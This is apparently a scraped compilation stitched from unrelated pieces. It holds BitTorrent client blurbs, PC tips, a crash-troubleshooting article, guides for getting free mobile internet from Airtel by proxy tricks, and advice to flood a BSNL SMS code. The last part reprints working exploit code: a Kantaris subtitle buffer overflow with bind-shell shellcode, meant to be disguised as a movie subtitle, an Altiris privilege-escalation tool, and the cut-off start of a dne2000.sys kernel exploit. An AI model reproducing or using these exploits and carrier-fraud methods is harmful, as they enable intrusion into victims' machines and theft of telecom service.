BitLord is a powerful C++ BitTorrent Client. BitLord is a p2p file-sharing freeware program fully compatible with Bittorrent, which is the most popular p2p protocol designed for high-speed distribution of 100MB or GB sized files. It supports simultaneous downloads, download queue, selected downloads in torrent package, fast-resume, chatting, disk cache, speed limits, port mapping, proxy, ip-filter, etc.Works with Windows 98/ME/2000/XP/2003.

μTorrent is a BitTorrent client that includes bandwidth prioritization, scheduling, RSS auto-downloading and Mainline DHT (compatible with BitComet). Additionally, µTorrent supports the Protocol Encryption joint specification and peer exchange. Windows only.

BitSpirit is a powerful and easy-to-use BitTorrent client. It supports simultaneous downloads, download queue, UPNP port-maping, NAT traversal(UDP transport), select downloads from multiple files torrent package, disk cache, chatting with other peers, torrent market,ip-filter, etc. Runs on Windows 98/Me/2000/XP/2003.

BitTornado is a BitTorrent client. Works on Windows, Linux, OS X, BSD.

BitTorrent for Windows brings together BitTorrent’s proven expertise in networking protocols with µTorrent’s efficient implementation and compelling UI to create a better BitTorrent client.

BitTyrant is a new, protocol compatible BitTorrent client that is optimized for fast download performance. Works with Linux, OS X, and Windows.

FlashGet is a leading download manager and has the highest amount of users on the Internet. It uses MHT(Multi-server Hyper-threading Transportation) technique, supports various protocols and has excellent document management features. FlashGet is a freeware without any adware or spyware.

Speed up ur Acrobat reader same as notepad

Do u get irritated when acrobat reader takes 5/10 seconds to load when you want to open a pdf document. There is a way to speed up the loading.

1. Go to the installation folder of acrobat reader
(C:\program files\adobe\acrobat\reader\.. whatever)

2. Move all the files and folders from the "plugins" directory to the "Optional" directory. (I repeat.. cut and paste the files NOT copy & paste).

Also make sure that acrobat reader is not open else it will lock the files and not allow you to move the files).

Now your acrobat reader will load very fast
and almost as good as notepad..

How to create con folder

easy way

hold alt and type 0160(for invisible character) and now leave alt and type con. now u r having folder named con

Airtel hack for free internet all methods

~cheers~
You need a PC or a Laptop and the required connectivity tools ,ie.,
Serial/USB cable OR Infrared Device OR Bluetooth dongle

1) Activate Airtel Live! ( Itâs FREE so no probs)

2) Create TWO Airtel gprs data accounts (yep TWO) and select the
FIRST as the active profile.

3) Connect your mobile to the PC (or Laptop) and install the driver for
your mobileâs modem.

4) Create a new dial-up connection using the NEW CONNECTION
WIZARD as follows

Connecting Device : Your mobileâs modem
ISP Name : Airtel (or anything you like)
Phone Number : *99***2# / Try 99***1
Username and Password : blank

5) Configure your browser and download manager to use the proxy
100.1.200.99 and port 8080.( My advice is to use Opera since you
can browse both wap and regular websites)

6) Connect to the dial-up account. You will be connected at 115.2
kbps (but remember, that is a bad joke).

7) Pick up your mobile and try to access any site. You will get âAccess
Deniedâ(except for Airtel Live!). IT DOES NOT MATTER.
Keep the mobile down.

8 ) On the PC ( or Laptop) open your browser, enter any address ,
press ENTER andâ¦â¦.WAIT

9) After a few seconds the page will start to load and you have the
WHOLE internet at your disposal. ***************************************************************************************************************

TWO

Under DATA COMM
~~~~~~~~~~~~

APN : airtelfun.com

USERNAME : blank

PASSWORD : blank

PASS REQ : OFF

ALLOW CALLS : AUTOMATIC

IPADDRESS :

DNSADDRESS :

DATA COMP : OFF

HEADER COMP : OFF

Under INTERNET PROFILES
~~~~~~~~~~~~~~~~

INTERNET MODE : HTTP or WAP (both worked for me)

USE PROXY : YES

IP ADDRESS : 100.1.200.99

PORT : 8080

USERNAME :

PASSWORD :

No Risk Here, Try it and Enjoy

Three

1st go to settings menu then to connectivity tab now choose the option Data comm. then “DATA ACCOUNTS” go to new account now the settings r as follows
ACCOUNT TYPE:GPRS
NEW ACCOUNT NAME:A1
APN:airtelfun.com
usr name: (blank)
password: (blank)

now save it
NOW!
go to Internet Setting in connectivity here choose intrnet profile–go to new profile setting are as below
NAME:A1
CONNECT USING:A1(which was created in data comm.)
save it
now u would be able to see it now selest it and take “more” option then select setting here in use proxy option it will be selected no if it is no then change it into yes
now go to proxy adress and give the adress as
100.1.200.99 and then the port number as 8080
Usr name:
password:
now save all the settings u made . come back 2 connectivity
choose streaming settings now in connect using option choose a1 that we created leave the use proxy option as no itself
THESE R THE SETTINGS
now access airtellive! from ur activated SE phone goto VIDEO GALLERY OR VIDEO UNLIMITED(varies according to states) choose live streaming then choose CNBC OR AAJTAK WHILE CONNECTING TO MEDIA SERVER cancel AFTER 9 or 10 sec then type any web adress if it shows access denied then once again select CNBC and wait for a few more sec than before if its fully connected also no prob its free then cancel it or if ur connected then stop it and the internet is ready to take of .GOOD LUCK SE AIRTEL USERS

alternate

For All Airtel Users

Requirements:
1. Airtel live (available 4 free)
2. Nokia series60 handset eg 6600,6630,n series,7610,6670 etc
3. Opera wap browser 4 mobile
Procedure:-

1. Go to ur connection settings and make a new internet profile using the default settings of airtel live. name that new profile as nething(for eg masala); change the home page of that profile to nething u like for eg www.google.com.

2. Go to ur Opera browser and set the default connection as AIRTEL LIVE. this is the original settings u received thru airtel.

3. Go to the services(in n6600) and Web(N6630) and change the default profile for connection as masala (newer one).

**Note: always make sure that ur access point is airtelfun.com

Apply:-

1. Open Opera and u will see that homepage of Airtel Live is opened. Minimize the application.

2. Now open web using the duplicate Profile and u will see that two gprs connections will work simultaneously and at the web or the services page it will show “Unable to connect” or any error. well thats the signal of ur success.

3. Simply go on the Opera with web on and open any site u want for free. No Charges No nothing.

U can also use it through ur computer……….

someone said dis too

The main principle behind this is we hav 2 fool the bsnl techies 2 activate portal and thus get gprs activated / get “G” signal on ur cell as bsnl portal (wap.cellone.in) needs “gprs signal on ur cel (whether gprs is formaly activated/registerd or not (by my method )i dont know)

NORMALLY THEY DONT DO THAT INSPITE OF THE FACT THAT THEY SHOULD ACTIVATE GPRS SIGNAL SERVICE FOR PORTAL!!!
AND THEY WILL GIVE U NO OF REASONS—-
—THAT portal is message based , so go to cellone icon in menu and use that sms based portal (what the f**k)
—THAT portal service will be activated when u will activate gprs by filling up form and registering at nearest CCN!!
—THAT ur handset has some problems (if u say that “G” signal is not present)
—-etc,etc!!

U HAVE 2 ACTIVATE PORTAL FIRST WHICH IS FREE AND U CAN EAT UP CC’S FOR THIS REASON!!
SO WHAT U HAV 2 DO IS–
1) SEND PORTAL to 3733 AND CONFIRMATION SHD COME WITH 5 MIN AT-MAXIMM !!
2) SEND FOR ATLEAST 20-30 TIMES (CAN B ANY MORE THAN THAT)
JUST S**K UP THE NETWORK(3733) WITH THESE MESSAGES !!!
THAT’S FREE NO!! BOTH ON POST AND PRE!!
3) NOW ALONG ALSO SEND 20-40 SMS AS GPRS TO 3733
(NO OF SMS DIRECTLY PROPORTIONAL 2 HATE FOR BSNL AND HOW EARLY U WNAN GET UR GPRS ACTIVATED) this is also free both on post and pre!!
4) U WILL GET CONFIRMATION IN BOTH CASES AND MSG TELLS U 2 GET SETTINGS FROM 9400024365, THE NO OF CC!!
HERE AT MY PLACE I CAN DIAL 9419024365 ALSO!
BOTH R TOLL FREE AND BOTH R LOCATED IN CHANDIGARH!!!
(((((((AND SOME OF THE CC’S SAY they cant give such sensitive information that where they r located, as if thay have a 3 rd world of their own! and the other dumbs said that they r in chandigarh!!!!)))))

I WOULD ADVISE ALL FIRST, 2 call them once 2 get the settings!!
(most of the times that is incorect but gives u an idea of settings in ur area))
Try and in ur 1 st call only,
talk roughly and tell them u r calling 10-20th time just for settings and is that their service!!!
5) Now when u get them save them AND plz post them here!!!
6) now GET ATLEAST 2-3 COMPLAINTS REGISTERED( each after 1 day) THAT UR PORTAL HAS NOT ACTIVATED AND GET THEIR SERIAL NO.
and in the end bombard them abt the status of all those complaints !!
b4 registering ur complaint they will hesitate much and always say taht they will b sendin new settings which r accurate! but dont belive them and just register complaints!!
6)AFTER THAT, u have 2 only wait until “G” signal is there on ur screen!!

LOOK, WHAT I HAVE WRIITEN ABV IS METHOD by which i got activated my “G” service !!! without fillin any form or such and without any money drain!!
may be since it bypasses the formal way of registeration, that is why this trick is working !!!!!!!!!!!!

U may also Try this

first open ur msg window and type LIVE and send it to 2567 so that after 5 min u get the setting of Airtel Live or if u have already no need for this procedure.
now then open that setting and copy all the settings from it and create one access point manually which has all the settings like Airtel Live has.
now only one change will be there and it would be in access point name which is “Airtelmms.com” instead of originally “Airtelgprs.com”.
ok u’ve done it just active that setting and access free airtel gprs on ur phone.

Another Trick
somya_cse
You need a PC or a Laptop and the required connectivity tools ,ie.,
Serial/USB cable OR Infrared Device OR Bluetooth dongle

1) Activate Airtel Live! ( Its FREE so no probs)

2) Create TWO Airtel gprs data accounts (yep TWO) and select the
FIRST as the active profile.

3) Connect your mobile to the PC (or Laptop) and install the driver for
your mobileâs modem.

4) Create a new dial-up connection using the NEW CONNECTION
WIZARD as follows

Connecting Device : Your mobileâs modem
ISP Name : Airtel (or anything you like)
Phone Number : *99***2#
Username and Password : blank

5) Configure your browser and download manager to use the proxy
100.1.200.99 and port 8080.( My advice is to use Opera since you
can browse both wap and regular websites)

6) Connect to the dial-up account. You will be connected at 115.2
kbps (but remember, that is a bad joke).

7) Pick up your mobile and try to access any site. You will get âAccess
Deniedâ¦â(except for Airtel Live!). IT DOES NOT MATTER.
Keep the mobile down.

8 ) On the PC ( or Laptop) open your browser, enter any address ,
press ENTER andâ¦â¦.WAIT

9) After a few seconds the page will start to load

main thing is the advance initialization command.

10 Reasons why PC's crash u must know

Fatal error: the system has become unstable or is busy," it says. "Enter to return to Windows or press Control-Alt-Delete to restart your computer. If you do this you will lose any unsaved information in all open applications."

You have just been struck by the Blue Screen of Death. Anyone who uses Mcft Windows will be familiar with this. What can you do? More importantly, how can you prevent it happening?

1 Hardware conflict

The number one reason why Windows crashes is hardware conflict. Each hardware device communicates to other devices through an interrupt request channel (IRQ). These are supposed to be unique for each device.

For example, a printer usually connects internally on IRQ 7. The keyboard usually uses IRQ 1 and the floppy disk drive IRQ 6. Each device will try to hog a single IRQ for itself.

If there are a lot of devices, or if they are not installed properly, two of them may end up sharing the same IRQ number. When the user tries to use both devices at the same time, a crash can happen. The way to check if your computer has a hardware conflict is through the following route:

* Start-Settings-Control Panel-System-Device Manager.

Often if a device has a problem a yellow '!' appears next to its description in the Device Manager. Highlight Computer (in the Device Manager) and press Properties to see the IRQ numbers used by your computer. If the IRQ number appears twice, two devices may be using it.

Sometimes a device might share an IRQ with something described as 'IRQ holder for PCI steering'. This can be ignored. The best way to fix this problem is to remove the problem device and reinstall it.

Sometimes you may have to find more recent drivers on the internet to make the device function properly. A good resource is www.driverguide.com. If the device is a soundcard, or a modem, it can often be fixed by moving it to a different slot on the motherboard (be careful about opening your computer, as you may void the warranty).

When working inside a computer you should switch it off, unplug the mains lead and touch an unpainted metal surface to discharge any static electricity.

To be fair to Mcft, the problem with IRQ numbers is not of its making. It is a legacy problem going back to the first PC designs using the IBM 8086 chip. Initially there were only eight IRQs. Today there are 16 IRQs in a PC. It is easy to run out of them. There are plans to increase the number of IRQs in future designs.

2 Bad Ram

Ram (random-access memory) problems might bring on the blue screen of death with a message saying Fatal Exception Error. A fatal error indicates a serious hardware problem. Sometimes it may mean a part is damaged and will need replacing.

But a fatal error caused by Ram might be caused by a mismatch of chips. For example, mixing 70-nanosecond (70ns) Ram with 60ns Ram will usually force the computer to run all the Ram at the slower speed. This will often crash the machine if the Ram is overworked.

One way around this problem is to enter the BIOS settings and increase the wait state of the Ram. This can make it more stable. Another way to troubleshoot a suspected Ram problem is to rearrange the Ram chips on the motherboard, or take some of them out. Then try to repeat the circumstances that caused the crash. When handling Ram try not to touch the gold connections, as they can be easily damaged.

Parity error messages also refer to Ram. Modern Ram chips are either parity (ECC) or non parity (non-ECC). It is best not to mix the two types, as this can be a cause of trouble.

EMM386 error messages refer to memory problems but may not be connected to bad Ram. This may be due to free memory problems often linked to old Dos-based programmes.

3 BIOS settings

Every motherboard is supplied with a range of chipset settings that are decided in the factory. A common way to access these settings is to press the F2 or delete button during the first few seconds of a boot-up.

Once inside the BIOS, great care should be taken. It is a good idea to write down on a piece of paper all the settings that appear on the screen. That way, if you change something and the computer becomes more unstable, you will know what settings to revert to.

A common BIOS error concerns the CAS latency. This refers to the Ram. Older EDO (extended data out) Ram has a CAS latency of 3. Newer SDRam has a CAS latency of 2. Setting the wrong figure can cause the Ram to lock up and freeze the computer's display.

Mcft Windows is better at allocating IRQ numbers than any BIOS. If possible set the IRQ numbers to Auto in the BIOS. This will allow Windows to allocate the IRQ numbers (make sure the BIOS setting for Plug and Play OS is switched to 'yes' to allow Windows to do this.).

4 Hard disk drives

After a few weeks, the information on a hard disk drive starts to become piecemeal or fragmented. It is a good idea to defragment the hard disk every week or so, to prevent the disk from causing a screen freeze. Go to

* Start-Programs-Accessories-System Tools-Disk Defragmenter

This will start the procedure. You will be unable to write data to the hard drive (to save it) while the disk is defragmenting, so it is a good idea to schedule the procedure for a period of inactivity using the Task Scheduler.

The Task Scheduler should be one of the small icons on the bottom right of the Windows opening page (the desktop).

Some lockups and screen freezes caused by hard disk problems can be solved by reducing the read-ahead optimisation. This can be adjusted by going to

* Start-Settings-Control Panel-System Icon-Performance-File System-Hard Disk.

Hard disks will slow down and crash if they are too full. Do some housekeeping on your hard drive every few months and free some space on it. Open the Windows folder on the C drive and find the Temporary Internet Files folder. Deleting the contents (not the folder) can free a lot of space.

Empty the Recycle Bin every week to free more space. Hard disk drives should be scanned every week for errors or bad sectors. Go to

* Start-Programs-Accessories-System Tools-ScanDisk

Otherwise assign the Task Scheduler to perform this operation at night when the computer is not in use.

5 Fatal OE exceptions and VXD errors

Fatal OE exception errors and VXD errors are often caused by video card problems.

These can often be resolved easily by reducing the resolution of the video display. Go to

* Start-Settings-Control Panel-Display-Settings

Here you should slide the screen area bar to the left. Take a look at the colour settings on the left of that window. For most desktops, high colour 16-bit depth is adequate.

If the screen freezes or you experience system lockups it might be due to the video card. Make sure it does not have a hardware conflict. Go to

* Start-Settings-Control Panel-System-Device Manager

Here, select the + beside Display Adapter. A line of text describing your video card should appear. Select it (make it blue) and press properties. Then select Resources and select each line in the window. Look for a message that says No Conflicts.

If you have video card hardware conflict, you will see it here. Be careful at this point and make a note of everything you do in case you make things worse.

The way to resolve a hardware conflict is to uncheck the Use Automatic Settings box and hit the Change Settings button. You are searching for a setting that will display a No Conflicts message.

Another useful way to resolve video problems is to go to

* Start-Settings-Control Panel-System-Performance-Graphics

Here you should move the Hardware Acceleration slider to the left. As ever, the most common cause of problems relating to graphics cards is old or faulty drivers (a driver is a small piece of software used by a computer to communicate with a device).

Look up your video card's manufacturer on the internet and search for the most recent drivers for it.

6 Viruses

Often the first sign of a virus infection is instability. Some viruses erase the boot sector of a hard drive, making it impossible to start. This is why it is a good idea to create a Windows start-up disk. Go to

* Start-Settings-Control Panel-Add/Remove Programs

Here, look for the Start Up Disk tab. Virus protection requires constant vigilance.

A virus scanner requires a list of virus signatures in order to be able to identify viruses. These signatures are stored in a DAT file. DAT files should be updated weekly from the website of your antivirus software manufacturer.

An excellent antivirus programme is McAfee VirusScan by Network Associates ( www.nai.com). Another is Norton AntiVirus 2000, made by Symantec ( www.symantec.com).

7 Printers

The action of sending a document to print creates a bigger file, often called a postscript file.

Printers have only a small amount of memory, called a buffer. This can be easily overloaded. Printing a document also uses a considerable amount of CPU power. This will also slow down the computer's performance.

If the printer is trying to print unusual characters, these might not be recognised, and can crash the computer. Sometimes printers will not recover from a crash because of confusion in the buffer. A good way to clear the buffer is to unplug the printer for ten seconds. Booting up from a powerless state, also called a cold boot, will restore the printer's default settings and you may be able to carry on.

8 Software

A common cause of computer crash is faulty or badly-installed software. Often the problem can be cured by uninstalling the software and then reinstalling it. Use Norton Uninstall or Uninstall Shield to remove an application from your system properly. This will also remove references to the programme in the System Registry and leaves the way clear for a completely fresh copy.

The System Registry can be corrupted by old references to obsolete software that you thought was uninstalled. Use Reg Cleaner by Jouni Vuorio to clean up the System Registry and remove obsolete entries. It works on Windows 95, Windows 98, Windows 98 SE (Second Edition), Windows Millennium Edition (ME), NT4 and Windows 2000.

Read the instructions and use it carefully so you don't do permanent damage to the Registry. If the Registry is damaged you will have to reinstall your operating system. Reg Cleaner can be obtained from www.jv16.org

Often a Windows problem can be resolved by entering Safe Mode. This can be done during start-up. When you see the message "Starting Windows" press F4. This should take you into Safe Mode.

Safe Mode loads a minimum of drivers. It allows you to find and fix problems that prevent Windows from loading properly.

Sometimes installing Windows is difficult because of unsuitable BIOS settings. If you keep getting SUWIN error messages (Windows setup) during the Windows installation, then try entering the BIOS and disabling the CPU internal cache. Try to disable the Level 2 (L2) cache if that doesn't work.

Remember to restore all the BIOS settings back to their former settings following installation.

9 Overheating

Central processing units (CPUs) are usually equipped with fans to keep them cool. If the fan fails or if the CPU gets old it may start to overheat and generate a particular kind of error called a kernel error. This is a common problem in chips that have been overclocked to operate at higher speeds than they are supposed to.

One remedy is to get a bigger better fan and install it on top of the CPU. Specialist cooling fans/heatsinks are available from www.computernerd.com or www.coolit.com

CPU problems can often be fixed by disabling the CPU internal cache in the BIOS. This will make the machine run more slowly, but it should also be more stable.

10 Power supply problems

With all the new construction going on around the country the steady supply of electricity has become disrupted. A power surge or spike can crash a computer as easily as a power cut.

If this has become a nuisance for you then consider buying a uninterrupted power supply (UPS). This will give you a clean power supply when there is electricity, and it will give you a few minutes to perform a controlled shutdown in case of a power cut.

It is a good investment if your data are critical, because a power cut will cause any unsaved data to be lost.

Kantaris 0.3.4 SSA Subtitle Local Buffer Overflow Exploit

###################################
#Kantaris 0.3.4 SSA Subtitle Local Buffer Overflow Exploit
###################################

#!/usr/bin/python
#
# Kantaris 0.3.4 Media Player Local Buffer Overflow [0day!]
#
# The following exploit will make a film.ssa file,
# just rename the file with the name of your movie, and use your imagination

# to pwn! :)
# Shellcode is local bind shell, just telnet to port:4444 to get command prompt :)
#
# BIG thanks to muts for helping
# and discovering a very interesting thing that we will publish soon

#
# I piss on your Business Networks course Igor Radusinovic! Go to hell!
#
# Vulnerability discovered by Muris Kurgas a.k.a. j0rgan
# jorganwd [at] gmail [dot] com
# http://www.jorgan.users.cg.yu


import os

jmp = '\xCC\x59\xFB\x77' # Windows XP sp1 JMP ESP, u can change it...

# win32_bind - EXITFUNC=seh LPORT=4444 Size=709 Encoder=PexAlphaNum
sc=("\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49"

"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36"
"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34"
"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41"

"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4c\x36\x4b\x4e"
"\x4d\x34\x4a\x4e\x49\x4f\x4f\x4f\x4f\x4f\x4f\x4f\x42\x46\x4b\x48"
"\x4e\x36\x46\x52\x46\x32\x4b\x38\x45\x54\x4e\x43\x4b\x48\x4e\x37"

"\x45\x50\x4a\x37\x41\x50\x4f\x4e\x4b\x38\x4f\x44\x4a\x51\x4b\x38"
"\x4f\x45\x42\x52\x41\x30\x4b\x4e\x49\x54\x4b\x48\x46\x43\x4b\x48"
"\x41\x30\x50\x4e\x41\x43\x42\x4c\x49\x49\x4e\x4a\x46\x48\x42\x4c"

"\x46\x57\x47\x50\x41\x4c\x4c\x4c\x4d\x30\x41\x30\x44\x4c\x4b\x4e"
"\x46\x4f\x4b\x33\x46\x55\x46\x52\x4a\x32\x45\x57\x45\x4e\x4b\x48"
"\x4f\x35\x46\x42\x41\x30\x4b\x4e\x48\x36\x4b\x58\x4e\x50\x4b\x44"

"\x4b\x48\x4f\x45\x4e\x51\x41\x50\x4b\x4e\x43\x50\x4e\x52\x4b\x48"
"\x49\x38\x4e\x36\x46\x42\x4e\x51\x41\x46\x43\x4c\x41\x33\x4b\x4d"
"\x46\x56\x4b\x58\x43\x54\x42\x33\x4b\x48\x42\x34\x4e\x50\x4b\x38"

"\x42\x57\x4e\x31\x4d\x4a\x4b\x38\x42\x34\x4a\x50\x50\x35\x4a\x36"
"\x50\x48\x50\x54\x50\x50\x4e\x4e\x42\x55\x4f\x4f\x48\x4d\x48\x56"
"\x43\x35\x48\x56\x4a\x56\x43\x53\x44\x53\x4a\x36\x47\x37\x43\x57"

"\x44\x33\x4f\x55\x46\x35\x4f\x4f\x42\x4d\x4a\x56\x4b\x4c\x4d\x4e"
"\x4e\x4f\x4b\x53\x42\x35\x4f\x4f\x48\x4d\x4f\x45\x49\x48\x45\x4e"
"\x48\x46\x41\x58\x4d\x4e\x4a\x50\x44\x30\x45\x55\x4c\x46\x44\x50"

"\x4f\x4f\x42\x4d\x4a\x56\x49\x4d\x49\x30\x45\x4f\x4d\x4a\x47\x55"
"\x4f\x4f\x48\x4d\x43\x45\x43\x45\x43\x55\x43\x55\x43\x45\x43\x34"
"\x43\x55\x43\x34\x43\x55\x4f\x4f\x42\x4d\x48\x46\x4a\x56\x41\x51"

"\x4e\x55\x48\x46\x43\x45\x49\x58\x41\x4e\x45\x49\x4a\x56\x46\x4a"
"\x4c\x51\x42\x47\x47\x4c\x47\x35\x4f\x4f\x48\x4d\x4c\x56\x42\x31"
"\x41\x45\x45\x45\x4f\x4f\x42\x4d\x4a\x46\x46\x4a\x4d\x4a\x50\x52"

"\x49\x4e\x47\x35\x4f\x4f\x48\x4d\x43\x35\x45\x35\x4f\x4f\x42\x4d"
"\x4a\x36\x45\x4e\x49\x34\x48\x38\x49\x54\x47\x45\x4f\x4f\x48\x4d"
"\x42\x45\x46\x55\x46\x35\x45\x55\x4f\x4f\x42\x4d\x43\x59\x4a\x46"

"\x47\x4e\x49\x57\x48\x4c\x49\x47\x47\x35\x4f\x4f\x48\x4d\x45\x45"
"\x4f\x4f\x42\x4d\x48\x56\x4c\x46\x46\x56\x48\x46\x4a\x36\x43\x36"
"\x4d\x56\x49\x38\x45\x4e\x4c\x56\x42\x55\x49\x55\x49\x42\x4e\x4c"

"\x49\x58\x47\x4e\x4c\x36\x46\x54\x49\x58\x44\x4e\x41\x43\x42\x4c"
"\x43\x4f\x4c\x4a\x50\x4f\x44\x54\x4d\x52\x50\x4f\x44\x54\x4e\x42"
"\x43\x49\x4d\x48\x4c\x47\x4a\x43\x4b\x4a\x4b\x4a\x4b\x4a\x4a\x46"

"\x44\x57\x50\x4f\x43\x4b\x48\x31\x4f\x4f\x45\x37\x46\x54\x4f\x4f"
"\x48\x4d\x4b\x55\x47\x55\x44\x45\x41\x55\x41\x55\x41\x35\x4c\x46"
"\x41\x30\x41\x35\x41\x55\x45\x55\x41\x35\x4f\x4f\x42\x4d\x4a\x46"

"\x4d\x4a\x49\x4d\x45\x30\x50\x4c\x43\x45\x4f\x4f\x48\x4d\x4c\x36"
"\x4f\x4f\x4f\x4f\x47\x53\x4f\x4f\x42\x4d\x4b\x58\x47\x35\x4e\x4f"
"\x43\x48\x46\x4c\x46\x56\x4f\x4f\x48\x4d\x44\x35\x4f\x4f\x42\x4d"

"\x4a\x36\x42\x4f\x4c\x38\x46\x50\x4f\x35\x43\x55\x4f\x4f\x48\x4d"
"\x4f\x4f\x42\x4d\x5a")

bafer = '\x41' * 163868 + jmp + "\x90" * 32 + sc

fileHandle = open ( 'film.ssa', 'w' )

fileHandle.write ( '[Script Info]\n')
fileHandle.write ( 'ScriptType: v4.00\n')
fileHandle.write ( 'Title: Kantaris 0.3.4 buffer-overflow\n')
fileHandle.write ( 'Collisions: Normal\n\n')

fileHandle.write ( '[V4 Styles]\n\n')
fileHandle.write ( '[Events]\n')

fileHandle.write ( 'Dialogue: '+ bafer)
fileHandle.close()

Symantec Altiris Client Service 6.8.378 Local Privilege Escalation Exp

###################################
#Symantec Altiris Client Service 6.8.378 Local Privilege Escalation Exp
###################################

// 0day PRIVATE NOT DISTRIBUTE!!!
//
// Symantec Altiris Client Service Local Exploit (0day)
//
// Affected Versions : Altiris Client 6.5.248
// Altiris Client 6.5.299
// Altiris client 6.8.378
//
// Alex Hernandez aka alt3kx
// ahernandez [at] sybsecurity.com
//
// Eduardo Vela aka sirdarckcat
// sirdarckcat [at] gmail.com
//
// We'll see you soon at ph-neutral 0x7d8

#include "stdio.h"
#include "windows.h"

int main(int argc, char* argv[])
{
HWND lHandle, lHandle2;
POINT point;
int id,a=0;
char langH[255][255];
char langO[255][255];
char wname[]="Altiris Client Service";

strcpy(langH[0x0c],"Aide de Windows");
strcpy(langH[0x09],"Windows Help");
strcpy(langH[0x0a],"Ayuda de Windows");

strcpy(langO[0x0c],"Ouvrir");
strcpy(langO[0x09],"Open");
strcpy(langO[0x0a],"Abrir");

printf("##########################################################\n");
printf("# Altiris Client Service #\n");
printf("# WM_COMMANDHELP Windows Privilege Escalation Exploit #\n");
printf("# by sirdarckcat & alt3kx #\n");
printf("# #\n");
printf("# This exploit is based on www.milw0rm.com/exploits/350 #\n");
printf("# Utility Manager Privilege Elevation Exploit (MS04-019) #\n");
printf("# by Cesar Cerrudo #\n");
printf("##########################################################\n\n");

id=PRIMARYLANGID(GetSystemDefaultLangID());
if (id==0 && (id=PRIMARYLANGID(GetUserDefaultLangID()))){
printf("Lang not found, using english\n");
id=9;
}

char sText[]="%windir%\\system32\\cmd.ex?";

if (argc<2){
printf("Use:\n> %s [LANG-ID]\n\n",argv[0]);
printf("Look for your LANG-ID here:\n");
printf("http://msdn2.microsoft.com/en-us/library/ms776294.aspx\n");
printf("\nAnyway, the program will try to guess it.\n\n");
return 0;
}else{
if (argc==2){
if (langH[atoi(argv[1])]){
id=atoi(argv[1]);
printf("Lang changed\n");
}else{
printf("Lang not supported\n",id);
}
}
}
printf("Using Lang %d\n",id);
printf("Looking for %s..\n",wname);
lHandle=FindWindow(NULL, wname);
if (!lHandle) {
printf("Window %s not found\n", wname);
return 0;
}else{
printf("Found! exploiting..\n");
}
PostMessage(lHandle,0x313,NULL,NULL);

Sleep(100);

SendMessage(lHandle,0x365,NULL,0x1);
Sleep(300);
pp:
if (!FindWindow(NULL, langH[id])){
printf("Help Window not found.. exploit unsuccesful\n");
if (id!=9){
printf("Trying with english..\n");
id=9;
goto pp;
}else{
return 0;
}
}else{
printf("Help Window found! exploiting..\n");
}
SendMessage (FindWindow(NULL, langH[id]), WM_IME_KEYDOWN, VK_RETURN, 0);
Sleep(500);
lHandle = FindWindow("#32770",langO[id]);
lHandle2 = GetDlgItem(lHandle, 0x47C);
Sleep(500);
printf("Sending path..\n");
SendMessage (lHandle2, WM_SETTEXT, 0, (LPARAM)sText);
Sleep(800);
SendMessage (lHandle2, WM_IME_KEYDOWN, VK_RETURN, 0);
lHandle2 = GetDlgItem(lHandle, 0x4A0);
printf("Looking for cmd..\n");
SendMessage (lHandle2, WM_IME_KEYDOWN, VK_TAB, 0);
Sleep(500);
lHandle2 = FindWindowEx(lHandle,NULL,"SHELLDLL_DefView", NULL);
lHandle2 = GetDlgItem(lHandle2, 0x1);
printf("Sending keys..\n");
SendMessage (lHandle2, WM_IME_KEYDOWN, 0x43, 0);
SendMessage (lHandle2, WM_IME_KEYDOWN, 0x4D, 0);
SendMessage (lHandle2, WM_IME_KEYDOWN, 0x44, 0);
Sleep(500);
mark:
PostMessage (lHandle2, WM_CONTEXTMENU, 0, 0);
Sleep(1000);
point.x =10; point.y =30;
lHandle2=WindowFromPoint(point);
Sleep(1000);
printf("Opening shell..\n");
SendMessage (lHandle2, WM_KEYDOWN, VK_DOWN, 0);
Sleep(1000);
SendMessage (lHandle2, WM_KEYDOWN, VK_DOWN, 0);
Sleep(1000);
SendMessage (lHandle2, WM_KEYDOWN, VK_RETURN, 0);
Sleep(1000);
if (!FindWindow(NULL,"C:\\WINDOWS\\system32\\cmd.exe") && !FindWindow(NULL,"C:\\WINNT\\system32\\cmd.exe")){
printf("Failed\n");
if (!a){
a++;
goto mark;
}
}else{
printf("Done!\n");
}
if(!a){
SendMessage (lHandle, WM_CLOSE,0,0);
Sleep(500);
SendMessage (FindWindow(NULL, langH[id]), WM_CLOSE, 0, 0);
SendMessage (FindWindow(NULL, argv[1]), WM_CLOSE, 0, 0);
}else{
printf("The exploit failed, but maybe the context window of the shell is visibile.\n");
}
return 0;
}

Deterministic Network Enhancer dne2000.sys kernel ring0 SYSTEM exploit

###################################
#Deterministic Network Enhancer dne2000.sys kernel ring0 SYSTEM exploit
###################################

/* dne2000-call.c
*
* Copyright (c) 2008 by
*
* Deterministic Network Enhancer (dne2000.sys) local kernel ring0 SYSTEM exploit
* by mu-b - Sun 06 Jan 2008
*
* - Tested on: dne2000.sys 2.21.7.233 <-> 3.21.7.17464
* bundled with: SafeNET HighAssurance Remote, SoftRemote
* Cisco VPN Client
* Winproxy
*
* Compile: MinGW + -lntdll
*
* - Private Source Code -DO NOT DISTRIBUTE -
* http://www.digit-labs.org/ -- Digit-Labs 2008!@$!
*/

#include
#include

#include
#include

#define DNE_IOCTL 0x00222008
#define DNE_FLAG 0x00001005

#define ITEM_FLAG_1 0x4A424F4E
#define ITEM_FLAG_2 0x47554C50
#define FUNC_FLAG 0x00010003

static unsigned char win32_fixup[] =
"\x56";

static unsigned char win2k3_ring0_shell[] =
/* _ring0 */
"\xb8\x24\xf1\xdf\xff"
"\x8b\x00"
"\x8b\xb0\x18\x02\x00\x00"
"\x89\xf0"
/* _sys_eprocess_loop */
"\x8b\x98\x94\x00\x00\x00"
"\x81\xfb\x04\x00\x00\x00"
"\x74\x11"
"\x8b\x80\x9c\x00\x00\x00"
"\x2d\x98\x00\x00\x00"
"\x39\xf0"
"\x75\xe3"
"\xeb\x21"
/* _sys_eprocess_found */
"\x89\xc1"
"\x89\xf0"

/* _cmd_eprocess_loop */
"\x8b\x98\x94\x00\x00\x00"
"\x81\xfb\x00\x00\x00\x00"
"\x74\x10"
"\x8b\x80\x9c\x00\x00\x00"
